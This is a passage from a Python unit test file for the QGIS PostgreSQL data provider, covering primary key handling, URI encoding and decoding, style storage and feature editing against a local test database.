vl2.setReadExtentFromXml(True)
vl2.readLayerXml(elem, QgsReadWriteContext())
self.assertTrue(vl2.isValid())
self.assertEqual(vl2.extent(), originalExtent)
def testDeterminePkey(self):
"""Test primary key auto-determination"""
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 type=POLYGON table="qgis_test"."authors" sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertTrue(vl.dataProvider().hasMetadata())
self.assertTrue("key='pk'" in vl.source())
def testCheckPkUnicityOnView(self):
# vector layer based on view
# This is valid
vl0 = QgsVectorLayer(
self.dbconn +
' checkPrimaryKeyUnicity=\'0\' sslmode=disable key=\'pk\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
geom = vl0.getFeature(1).geometry().asWkt()
# This is NOT valid
vl0 = QgsVectorLayer(
self.dbconn +
' checkPrimaryKeyUnicity=\'1\' sslmode=disable key=\'an_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
'test', 'postgres')
self.assertFalse(vl0.isValid())
# This is NOT valid because the default is to check unicity
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'an_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
'test', 'postgres')
self.assertFalse(vl0.isValid())
# This is valid because the readExtentFromXml option is set
# loadDefaultStyle, readExtentFromXml
options = QgsVectorLayer.LayerOptions(True, True)
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'an_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
'test', 'postgres', options)
self.assertTrue(vl0.isValid())
# Valid because a_unique_int is unique and default is to check unicity
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'a_unique_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
'test', 'postgres')
self.assertEqual(vl0.getFeature(1).geometry().asWkt(), geom)
# Valid because a_unique_int is unique
vl0 = QgsVectorLayer(
self.dbconn +
' checkPrimaryKeyUnicity=\'1\' sslmode=disable key=\'a_unique_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
self.assertEqual(vl0.getFeature(1).geometry().asWkt(), geom)
def testNotify(self):
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
vl0.dataProvider().setListening(True)
class Notified(QObject):
def __init__(self):
super(Notified, self).__init__()
self.received = ""
def receive(self, msg):
self.received = msg
notified = Notified()
vl0.dataProvider().notify.connect(notified.receive)
vl0.dataProvider().setListening(True)
cur = self.con.cursor()
ok = False
start = time.time()
while True:
cur.execute("NOTIFY qgis, 'my message'")
self.con.commit()
QGISAPP.processEvents()
if notified.received == "my message":
ok = True
break
if (time.time() - start) > 5: # timeout
break
vl0.dataProvider().notify.disconnect(notified.receive)
vl0.dataProvider().setListening(False)
self.assertTrue(ok)
def testStyleDatabaseWithService(self):
"""Test saving style in DB using a service file.
To run this test, you first need to setup the test
database with tests/testdata/provider/testdata_pg.sh
"""
myconn = 'service=\'qgis_test\''
if 'QGIS_PGTEST_DB' in os.environ:
myconn = os.environ['QGIS_PGTEST_DB']
myvl = QgsVectorLayer(
myconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
styles = myvl.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 0)
myvl.saveStyleToDatabase('mystyle', '', False, '')
styles = myvl.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 1)
myvl.deleteStyleFromDatabase(ids[0])
styles = myvl.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 0)
def testCurveToMultipolygon(self):
self.execSQLCommand(
'CREATE TABLE IF NOT EXISTS multicurve(pk SERIAL NOT NULL PRIMARY KEY, geom public.geometry(MultiPolygon, 4326))')
self.execSQLCommand('TRUNCATE multicurve')
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=MULTIPOLYGON table="multicurve" (geom) sql=',
'test', 'postgres')
f = QgsFeature(vl.fields())
f.setGeometry(QgsGeometry.fromWkt(
'CurvePolygon(CircularString (20 30, 50 30, 50 90, 10 50, 20 30))'))
self.assertTrue(vl.startEditing())
self.assertTrue(vl.addFeatures([f]))
self.assertTrue(vl.commitChanges())
f = next(vl.getFeatures(QgsFeatureRequest()))
g = f.geometry().constGet()
self.assertTrue(g)
self.assertEqual(g.wkbType(), QgsWkbTypes.MultiPolygon)
self.assertEqual(g.childCount(), 1)
self.assertTrue(g.childGeometry(0).vertexCount() > 3)
def testMassivePaste(self):
"""Speed test to compare createFeature and createFeatures, for regression #21303"""
import time
self.execSQLCommand(
'CREATE TABLE IF NOT EXISTS massive_paste(pk SERIAL NOT NULL PRIMARY KEY, geom public.geometry(Polygon, 4326))')
self.execSQLCommand('TRUNCATE massive_paste')
start_time = time.time()
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="massive_paste" (geom) sql=',
'test_massive_paste', 'postgres')
self.assertTrue(vl.startEditing())
features = []
context = vl.createExpressionContext()
for i in range(4000):
features.append(
QgsVectorLayerUtils.createFeature(vl, QgsGeometry.fromWkt('Polygon ((7 44, 8 45, 8 46, 7 46, 7 44))'),
{0: i}, context))
self.assertTrue(vl.addFeatures(features))
self.assertTrue(vl.commitChanges())
self.assertEqual(vl.featureCount(), 4000)
print("--- %s seconds ---" % (time.time() - start_time))
self.execSQLCommand('TRUNCATE massive_paste')
start_time = time.time()
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="massive_paste" (geom) sql=',
'test_massive_paste', 'postgres')
self.assertTrue(vl.startEditing())
features_data = []
context = vl.createExpressionContext()
for i in range(4000):
features_data.append(
QgsVectorLayerUtils.QgsFeatureData(QgsGeometry.fromWkt('Polygon ((7 44, 8 45, 8 46, 7 46, 7 44))'),
{0: i}))
features = QgsVectorLayerUtils.createFeatures(
vl, features_data, context)
self.assertTrue(vl.addFeatures(features))
self.assertTrue(vl.commitChanges())
self.assertEqual(vl.featureCount(), 4000)
print("--- %s seconds ---" % (time.time() - start_time))
def testFilterOnCustomBbox(self):
extent = QgsRectangle(-68, 70, -67, 80)
request = QgsFeatureRequest().setFilterRect(extent)
dbconn = 'service=qgis_test'
uri = '%s srid=4326 key="pk" sslmode=disable table="qgis_test"."some_poly_data_shift_bbox" (geom)' % (
dbconn)
def _test(vl, ids):
values = {feat['pk']: 'x' for feat in vl.getFeatures(request)}
expected = {x: 'x' for x in ids}
self.assertEqual(values, expected)
vl = QgsVectorLayer(uri, "testgeom", "postgres")
self.assertTrue(vl.isValid())
_test(vl, [2, 3])
vl = QgsVectorLayer(uri + ' bbox=shiftbox', "testgeom", "postgres")
self.assertTrue(vl.isValid())
_test(vl, [1, 3])
def testValidLayerDiscoverRelationsNone(self):
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertEqual(vl.dataProvider().discoverRelations(vl, []), [])
def testInvalidLayerDiscoverRelations(self):
vl = QgsVectorLayer('{} table="qgis_test"."invalid_layer" sql='.format(self.dbconn), "invalid_layer",
"postgres")
self.assertFalse(vl.isValid())
self.assertEqual(vl.dataProvider().discoverRelations(vl, []), [])
def testCheckTidPkOnViews(self):
"""Test vector layer based on a view with `ctid` as a key"""
# This is valid
vl0 = QgsVectorLayer(
self.dbconn +
' checkPrimaryKeyUnicity=\'0\' sslmode=disable key=\'ctid\' srid=4326 type=POINT table="qgis_test"."b31799_test_view_ctid" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
self.assertEqual(vl0.featureCount(), 10)
for f in vl0.getFeatures():
self.assertNotEqual(f.attribute(0), NULL)
def testFeatureCountEstimatedOnTable(self):
"""
Test feature count on table when estimated data is enabled
"""
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' estimatedmetadata=true srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertTrue(vl.featureCount() > 0)
def testFeatureCountEstimatedOnView(self):
"""
Test feature count on view when estimated data is enabled
"""
self.execSQLCommand('DROP VIEW IF EXISTS qgis_test.somedataview')
self.execSQLCommand(
'CREATE VIEW qgis_test.somedataview AS SELECT * FROM qgis_test."someData"')
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' estimatedmetadata=true srid=4326 type=POINT table="qgis_test"."somedataview" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertTrue(vl.featureCount() > 0)
def testIdentityPk(self):
"""Test a table with identity pk, see GH #29560"""
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'gid\' srid=4326 type=POLYGON table="qgis_test"."b29560"(geom) sql=',
'testb29560', 'postgres')
self.assertTrue(vl.isValid())
feature = QgsFeature(vl.fields())
geom = QgsGeometry.fromWkt('POLYGON EMPTY')
feature.setGeometry(geom)
self.assertTrue(vl.dataProvider().addFeature(feature))
del (vl)
# Verify
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'gid\' srid=4326 type=POLYGON table="qgis_test"."b29560"(geom) sql=',
'testb29560', 'postgres')
self.assertTrue(vl.isValid())
feature = next(vl.getFeatures())
self.assertIsNotNone(feature.id())
@unittest.skipIf(os.environ.get('TRAVIS', '') == 'true', 'Test flaky')
def testDefaultValuesAndClauses(self):
"""Test whether default values like CURRENT_TIMESTAMP or
now() they are respected. See GH #33383"""
# Create the test table
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable table="public"."test_table_default_values" sql=', 'test',
'postgres')
self.assertTrue(vl.isValid())
dp = vl.dataProvider()
# Clean the table
dp.deleteFeatures(dp.allFeatureIds())
# Save it for the test
now = datetime.now()
# Test default values
dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 1)
# FIXME: spatialite provider (and OGR) return a NULL here and the following passes
# self.assertTrue(dp.defaultValue(0).isNull())
self.assertIsNotNone(dp.defaultValue(0))
self.assertIsNone(dp.defaultValue(1))
self.assertTrue(dp.defaultValue(
2).startswith(now.strftime('%Y-%m-%d')))
self.assertTrue(dp.defaultValue(
3).startswith(now.strftime('%Y-%m-%d')))
self.assertEqual(dp.defaultValue(4), 123)
self.assertEqual(dp.defaultValue(5), 'My default')
# FIXME: the provider should return the clause definition
# regardless of the EvaluateDefaultValues setting
dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 0)
self.assertEqual(dp.defaultValueClause(
0), "nextval('test_table_default_values_id_seq'::regclass)")
self.assertEqual(dp.defaultValueClause(1), '')
self.assertEqual(dp.defaultValueClause(2), "now()")
self.assertEqual(dp.defaultValueClause(3), "CURRENT_TIMESTAMP")
self.assertEqual(dp.defaultValueClause(4), '123')
self.assertEqual(dp.defaultValueClause(5), "'My default'::text")
# FIXME: the test fails if the value is not reset to 1
dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 1)
feature = QgsFeature(vl.fields())
for idx in range(vl.fields().count()):
default = vl.dataProvider().defaultValue(idx)
if default is not None:
feature.setAttribute(idx, default)
else:
feature.setAttribute(idx, 'A comment')
self.assertTrue(vl.dataProvider().addFeature(feature))
del (vl)
# Verify
vl2 = QgsVectorLayer(self.dbconn + ' sslmode=disable table="public"."test_table_default_values" sql=', 'test',
'postgres')
self.assertTrue(vl2.isValid())
feature = next(vl2.getFeatures())
self.assertEqual(feature.attribute(1), 'A comment')
self.assertTrue(feature.attribute(
2).startswith(now.strftime('%Y-%m-%d')))
self.assertTrue(feature.attribute(
3).startswith(now.strftime('%Y-%m-%d')))
self.assertEqual(feature.attribute(4), 123)
self.assertEqual(feature.attribute(5), 'My default')
def testEncodeDecodeUri(self):
"""Test PG encode/decode URI"""
md = QgsProviderRegistry.instance().providerMetadata('postgres')
self.assertEqual(md.decodeUri(
'dbname=\'qgis_tests\' host=localhost port=5432 user=\'myuser\' sslmode=disable estimatedmetadata=true srid=3067 table="public"."basic_map_tiled" (rast)'),
{'dbname': 'qgis_tests',
'estimatedmetadata': True,
'geometrycolumn': 'rast',
'host': 'localhost',
'port': '5432',
'schema': 'public',
'srid': '3067',
'sslmode': 1,
'table': 'basic_map_tiled',
'username': 'myuser'})
self.assertEqual(md.decodeUri(
'dbname=\'qgis_tests\' host=localhost port=5432 user=\'myuser\' sslmode=disable key=\'id\' estimatedmetadata=true srid=3763 type=MultiPolygon checkPrimaryKeyUnicity=\'1\' table="public"."copas1" (geom)'),
{'dbname': 'qgis_tests',
'estimatedmetadata': True,
'geometrycolumn': 'geom',
'host': 'localhost',
'key': 'id',
'port': '5432',
'schema': 'public',
'srid': '3763',
'sslmode': 1,
'table': 'copas1',
'type': 6,
'username': 'myuser'})
self.assertEqual(md.encodeUri({'dbname': 'qgis_tests',
'estimatedmetadata': True,
'geometrycolumn': 'geom',
'host': 'localhost',
'key': 'id',
'port': '5432',
'schema': 'public',
'srid': '3763',
'sslmode': 1,
'table': 'copas1',
'type': 6,
'username': 'myuser'}),
"dbname='qgis_tests' user='myuser' srid=3763 estimatedmetadata='true' host='localhost' key='id' port='5432' sslmode='disable' type='MultiPolygon' table=\"public\".\"copas1\" (geom)")
self.assertEqual(md.encodeUri({'dbname': 'qgis_tests',
'estimatedmetadata': True,
'geometrycolumn': 'rast',
'host': 'localhost',
'port': '5432',
'schema': 'public',
'srid': '3067',
'sslmode': 1,
'table': 'basic_map_tiled',
'username': 'myuser'}),
"dbname='qgis_tests' user='myuser' srid=3067 estimatedmetadata='true' host='localhost' port='5432' sslmode='disable' table=\"public\".\"basic_map_tiled\" (rast)")
def _round_trip(uri):
decoded = md.decodeUri(uri)
self.assertEqual(decoded, md.decodeUri(md.encodeUri(decoded)))
uri = self.dbconn + \
' sslmode=disable key=\'gid\' srid=3035 table="public"."my_pg_vector" sql='
decoded = md.decodeUri(uri)
self.assertEqual(decoded, {
'key': 'gid',
'schema': 'public',
'service': 'qgis_test',
'srid': '3035',
'sslmode': QgsDataSourceUri.SslDisable,
'table': 'my_pg_vector',
})
_round_trip(uri)
uri = self.dbconn + \
' sslmode=prefer key=\'gid\' srid=3035 temporalFieldIndex=2 ' + \
'authcfg=afebeff username=\'my username\' password=\'my secret password=\' ' + \
'table="public"."my_pg_vector" (the_geom) sql="a_field" != 1223223'
_round_trip(uri)
decoded = md.decodeUri(uri)
self.assertEqual(decoded, {
'authcfg': 'afebeff',
'geometrycolumn': 'the_geom',
'key': 'gid',
'password': 'my secret password=',
'schema': 'public',
'service': 'qgis_test',
'sql': '"a_field" != 1223223',
'srid': '3035',
'sslmode': QgsDataSourceUri.SslPrefer,
'table': 'my_pg_vector',
'username': 'my username',
})
class TestPyQgsPostgresProviderCompoundKey(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
cls.dbconn = 'service=qgis_test'
if 'QGIS_PGTEST_DB' in os.environ:
cls.dbconn = os.environ['QGIS_PGTEST_DB']
# Create test layers
cls.vl = QgsVectorLayer(
cls.dbconn +
' sslmode=disable key=\'"key1","key2"\' srid=4326 type=POINT table="qgis_test"."someDataCompound" (geom) sql=',
'test', 'postgres')
assert cls.vl.isValid()
cls.source = cls.vl.dataProvider()
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def enableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', True)
return True
def disableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', False)
def uncompiledFilters(self):
return set(['"dt" = to_datetime(\'000www14ww13ww12www4ww5ww2020\',\'zzzwwwsswwmmwwhhwwwdwwMwwyyyy\')',
'"date" = to_date(\'www4ww5ww2020\',\'wwwdwwMwwyyyy\')',
'"time" = to_time(\'000www14ww13ww12www\',\'zzzwwwsswwmmwwhhwww\')'])
def partiallyCompiledFilters(self):
return set([])
def testConstraints(self):
for key in ["key1", "key2"]:
idx = self.vl.dataProvider().fieldNameIndex(key)
self.assertTrue(idx >= 0)
self.assertFalse(self.vl.dataProvider().fieldConstraints(
idx) & QgsFieldConstraints.ConstraintUnique)
def testCompoundPkChanges(self):
""" Check if fields with compound primary keys can be changed """
vl = self.vl
self.assertTrue(vl.isValid())
idx_key1 = vl.fields().lookupField('key1')
idx_key2 = vl.fields().lookupField('key2')
# the name "pk" for this datasource is misleading;
# the primary key is actually composed by the fields key1 and key2
idx_pk = vl.fields().lookupField('pk')
idx_name = vl.fields().lookupField('name')
idx_name2 = vl.fields().lookupField('name2')
geomwkt = 'Point(-47.945 -15.812)'
# start editing ordinary attribute.
ft1 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("key1 = 2 AND key2 = 2")))
self.assertTrue(ft1.isValid())
original_geometry = ft1.geometry().asWkt()
vl.startEditing()
self.assertTrue(vl.changeAttributeValues(ft1.id(), {idx_name: 'Rose'}))
self.assertTrue(vl.commitChanges())
# check change
ft2 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("key1 = 2 AND key2 = 2")))
self.assertEqual(ft2['name'], 'Rose')
self.assertEqual(ft2['name2'], 'Apple')
self.assertEqual(ft2['pk'], 2)
# now, start editing one of the PK field components
vl.startEditing()
self.assertTrue(vl.dataProvider().changeFeatures({ft2.id(): {idx_key2: 42, idx_name: 'Orchid', idx_name2: 'Daisy'}}, {ft2.id(): QgsGeometry.fromWkt(geomwkt)}))
self.assertTrue(vl.commitChanges())
# let's check if we still have the same fid...
ft2 = next(vl.getFeatures(QgsFeatureRequest().setFilterFid(ft2.id())))
self.assertEqual(ft2['key2'], 42)
self.assertEqual(ft2['name'], 'Orchid')
self.assertEqual(ft2['name2'], 'Daisy')
self.assertTrue(vl.startEditing())
vl.changeAttributeValues(ft2.id(), {idx_key1: 21, idx_name2: 'Hibiscus'})
self.assertTrue(vl.commitChanges())
ft2 = next(vl.getFeatures(QgsFeatureRequest().setFilterFid(ft2.id())))
self.assertEqual(ft2['key1'], 21)
self.assertEqual(ft2['name2'], 'Hibiscus')
# lets get a brand new feature and check how it went...
ft3 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk = 2')))
self.assertEqual(ft3['name'], 'Orchid')
self.assertEqual(ft3['key1'], 21)
self.assertEqual(ft3['key2'], 42)
assert compareWkt(ft3.geometry().asWkt(), geomwkt), "Geometry mismatch. Expected: {} Got: {}\n".format(ft3.geometry().asWkt(), geomwkt)
# Now, we leave the record as we found it, so further tests can proceed
vl.startEditing()
self.assertTrue(vl.dataProvider().changeFeatures({ft3.id(): {idx_key1: 2, idx_key2: 2, idx_pk: 2, idx_name: 'Apple', idx_name2: 'Apple'}}, {ft3.id(): QgsGeometry.fromWkt(original_geometry)}))
self.assertTrue(vl.commitChanges())
class TestPyQgsPostgresProviderBigintSinglePk(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
cls.dbconn = 'service=qgis_test'
if 'QGIS_PGTEST_DB' in os.environ:
cls.dbconn = os.environ['QGIS_PGTEST_DB']
# Create test layers
cls.vl = QgsVectorLayer(
cls.dbconn +
' sslmode=disable key=\'"pk"\' srid=4326 type=POINT table="qgis_test"."provider_bigint_single_pk" (geom) sql=',
'bigint_pk', 'postgres')
assert cls.vl.isValid()
cls.source = cls.vl.dataProvider()
cls.con = psycopg2.connect(cls.dbconn)
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def getSource(self):
""" drops/recreates the test data anew, like TestPyQgsPostgresProvider::getSource above. """
self.execSqlCommand(
"DROP TABLE IF EXISTS qgis_test.provider_edit_bigint_single_pk")
self.execSqlCommand(
"CREATE TABLE qgis_test.provider_edit_bigint_single_pk ( pk bigserial PRIMARY KEY, cnt integer, name text DEFAULT 'qgis', name2 text DEFAULT 'qgis', num_char text, dt timestamp without time zone, \"date\" date, \"time\" time without time zone, geom public.geometry(Point,4326), key1 integer, key2 integer)")
self.execSqlCommand(
"INSERT INTO qgis_test.provider_edit_bigint_single_pk ( key1, key2, pk, cnt, name, name2, num_char, dt, \"date\", \"time\", geom) VALUES"
"(1, 1, 5, -200, NULL, 'NuLl', '5', TIMESTAMP '2020-05-04 12:13:14', '2020-05-02', '12:13:01', '0101000020E61000001D5A643BDFC751C01F85EB51B88E5340'),"
"(1, 2, 3, 300, 'Pear', 'PEaR', '3', NULL, NULL, NULL, NULL),"
"(2, 1, 1, 100, 'Orange', 'oranGe', '1', TIMESTAMP '2020-05-03 12:13:14', '2020-05-03', '12:13:14', '0101000020E61000006891ED7C3F9551C085EB51B81E955040'),"
"(2, 2, 2, 200, 'Apple', 'Apple', '2', TIMESTAMP '2020-05-04 12:14:14', '2020-05-04', '12:14:14', '0101000020E6100000CDCCCCCCCC0C51C03333333333B35140'),"
"(2, 3, 4, 400, 'Honey', 'Honey', '4', TIMESTAMP '2021-05-04 13:13:14', '2021-05-04', '13:13:14', '0101000020E610000014AE47E17A5450C03333333333935340')")
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'"pk"\' srid=4326 type=POINT table="qgis_test"."provider_edit_bigint_single_pk" (geom) sql=',
'edit_bigint_pk', 'postgres')
return vl
def getEditableLayer(self):
return self.getSource()
def execSqlCommand(self, sql):
self.assertTrue(self.con)
cur = self.con.cursor()
self.assertTrue(cur)
cur.execute(sql)
cur.close()
self.con.commit()
def enableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', True)
return True
def disableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', False)
def uncompiledFilters(self):
return set(['"dt" = to_datetime(\'000www14ww13ww12www4ww5ww2020\',\'zzzwwwsswwmmwwhhwwwdwwMwwyyyy\')',
'"date" = to_date(\'www4ww5ww2020\',\'wwwdwwMwwyyyy\')',
'"time" = to_time(\'000www14ww13ww12www\',\'zzzwwwsswwmmwwhhwww\')'])
def partiallyCompiledFilters(self):
return set([])
def testConstraints(self):
idx = self.vl.dataProvider().fieldNameIndex("pk")
self.assertTrue(idx >= 0)
def testGetFeaturesFidTests(self):
fids = [f.id() for f in self.source.getFeatures()]
assert len(fids) == 5, 'Expected 5 features, got {} instead'.format(
len(fids))
for id in fids:
features = [f for f in self.source.getFeatures(
QgsFeatureRequest().setFilterFid(id))]
self.assertEqual(len(features), 1)
feature = features[0]
self.assertTrue(feature.isValid())
result = [feature.id()]
expected = [id]
assert result == expected, 'Expected {} and got {} when testing for feature ID filter'.format(expected,
result)
# test that results match QgsFeatureRequest.acceptFeature
request = QgsFeatureRequest().setFilterFid(id)
for f in self.source.getFeatures():
self.assertEqual(request.acceptFeature(f), f.id() == id)
# TODO: bad features are not tested because the PostgreSQL provider
# doesn't mark explicitly set invalid features as such.
def testGetFeatures(self, source=None, extra_features=[], skip_features=[], changed_attributes={},
changed_geometries={}):
""" Test that expected results are returned when fetching all features """
# IMPORTANT - we do not use `for f in source.getFeatures()` as we are also
# testing that existing attributes & geometry in f are overwritten correctly
# (for f in ... uses a new QgsFeature for every iteration)
if not source:
source = self.source
it = source.getFeatures()
f = QgsFeature()
attributes = {}
geometries = {}
while it.nextFeature(f):
# expect feature to be valid
self.assertTrue(f.isValid())
# some source test datasets will include additional attributes which we ignore,
# so cherry pick desired attributes
attrs = [f['pk'], f['cnt'], f['name'], f['name2'], f['num_char']]
# DON'T force the num_char attribute to be text - some sources (e.g., delimited text) will
# automatically detect that this attribute contains numbers and set it as a numeric
# field
# TODO: PostgreSQL 12 won't accept conversion from integer to text.
# attrs[4] = str(attrs[4])
attributes[f['pk']] = attrs
geometries[f['pk']] = f.hasGeometry() and f.geometry().asWkt()
expected_attributes = {5: [5, -200, NULL, 'NuLl', '5'],
3: [3, 300, 'Pear', 'PEaR', '3'],
1: [1, 100, 'Orange', 'oranGe', '1'],
2: [2, 200, 'Apple', 'Apple', '2'],
4: [4, 400, 'Honey', 'Honey', '4']}
expected_geometries = {1: 'Point (-70.332 66.33)',
2: 'Point (-68.2 70.8)',
3: None,
4: 'Point(-65.32 78.3)',
5: 'Point(-71.123 78.23)'}
for f in extra_features:
expected_attributes[f[0]] = f.attributes()
if f.hasGeometry():
expected_geometries[f[0]] = f.geometry().asWkt()
else:
expected_geometries[f[0]] = None
for i in skip_features:
del expected_attributes[i]
del expected_geometries[i]
for i, a in changed_attributes.items():
for attr_idx, v in a.items():
expected_attributes[i][attr_idx] = v
for i, g, in changed_geometries.items():
if g:
expected_geometries[i] = g.asWkt()
else:
expected_geometries[i] = None
self.assertEqual(attributes, expected_attributes, 'Expected {}, got {}'.format(
expected_attributes, attributes))
self.assertEqual(len(expected_geometries), len(geometries))
for pk, geom in list(expected_geometries.items()):
if geom:
assert compareWkt(geom, geometries[pk]), "Geometry {} mismatch Expected:\n{}\nGot:\n{}\n".format(pk,
geom,
geometries[
pk])
else:
self.assertFalse(
geometries[pk], 'Expected null geometry for {}'.format(pk))
def testAddFeatureExtraAttributes(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
return
# test that adding features with too many attributes drops these attributes
# we be more tricky and also add a valid feature to stress test the provider
f1 = QgsFeature()
f1.setAttributes([6, -220, 'qgis', 'String', '15'])
f2 = QgsFeature()
f2.setAttributes([7, -230, 'qgis', 'String', '15', 15, 16, 17])
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertTrue(result,
'Provider returned False to addFeatures with extra attributes. Providers should accept these features but truncate the extra attributes.')
# make sure feature was added correctly
added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 7][0]
# TODO: The PostgreSQL provider doesn't truncate extra attributes!
self.assertNotEqual(added.attributes(), [7, -230, 'qgis', 'String', '15'],
'The PostgreSQL provider doesn\'t truncate extra attributes.')
def testAddFeatureMissingAttributes(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
return
# test that adding features with missing attributes pads out these
# attributes with NULL values to the correct length.
# changed from ProviderTestBase.testAddFeatureMissingAttributes: we use
# 'qgis' instead of NULL below.
# TODO: Only unmentioned attributes get filled with the DEFAULT table
# value; if the attribute is present, the saved value will be NULL if
# that is indicated, or the value mentioned by the user; there is no
# implicit conversion of PyQGIS::NULL to PostgreSQL DEFAULT.
f1 = QgsFeature()
f1.setAttributes([6, -220, 'qgis', 'String'])
f2 = QgsFeature()
f2.setAttributes([7, 330])
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertTrue(result,
'Provider returned False to addFeatures with missing attributes. Providers should accept these features but add NULL attributes to the end of the existing attributes to the required field length.')
f1.setId(added[0].id())
f2.setId(added[1].id())
# check result - feature attributes MUST be padded out to required number of fields
f1.setAttributes([6, -220, 'qgis', 'String', NULL])
f2.setAttributes([7, 330, 'qgis', 'qgis', NULL])
self.testGetFeatures(l.dataProvider(), [f1, f2])
def testAddFeature(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
f1 = QgsFeature()
# changed from ProviderTestBase.testAddFeature: we use 'qgis' instead
# of NULL below.
# TODO: Only unmentioned attributes get filled with the DEFAULT table
# value; if the attribute is present, the saved value will be NULL if
# that is indicated, or the value mentioned by the user; there is no
# implicit conversion of PyQGIS::NULL to PostgreSQL DEFAULT.
f1.setAttributes([6, -220, 'qgis', 'String', '15'])
f1.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))
f2 = QgsFeature()
f2.setAttributes([7, 330, 'Coconut', 'CoCoNut', '13'])
if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
# expect success
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertTrue(
result, 'Provider reported AddFeatures capability, but returned False to addFeatures')
f1.setId(added[0].id())
f2.setId(added[1].id())
# check result
self.testGetFeatures(l.dataProvider(), [f1, f2])
# add empty list, should return true for consistency
self.assertTrue(l.dataProvider().addFeatures([]))
# ensure that returned features have been given the correct id
f = next(l.getFeatures(
QgsFeatureRequest().setFilterFid(added[0].id())))
self.assertTrue(f.isValid())
self.assertEqual(f['cnt'], -220)
f = next(l.getFeatures(
QgsFeatureRequest().setFilterFid(added[1].id())))
self.assertTrue(f.isValid())
self.assertEqual(f['cnt'], 330)
else:
# expect fail
self.assertFalse(l.dataProvider().addFeatures([f1, f2]),
'Provider reported no AddFeatures capability, but returned true to addFeatures')
def testModifyPk(self):
""" Check if we can modify a primary key value. Since this PK is bigint, we also exercise the mapping between fid and values """
vl = self.getEditableLayer()
self.assertTrue(vl.isValid())
geomwkt = 'Point(-47.945 -15.812)'
feature = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk = 4')))
self.assertTrue(feature.isValid())
self.assertTrue(vl.startEditing())
idxpk = vl.fields().lookupField('pk')
self.assertTrue(vl.dataProvider().changeFeatures({feature.id(): {idxpk: 42}}, {feature.id(): QgsGeometry.fromWkt(geomwkt)}))
self.assertTrue(vl.commitChanges())
# read back
ft = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk = 42')))
self.assertTrue(ft.isValid())
self.assertEqual(ft['name'], 'Honey')
assert compareWkt(ft.geometry().asWkt(), geomwkt), "Geometry mismatch. Expected: {} Got: {}\n".format(ft.geometry().asWkt(), geomwkt)
def testDuplicatedFieldNamesInQueryLayers(self):
"""Test regresssion GH #36205"""
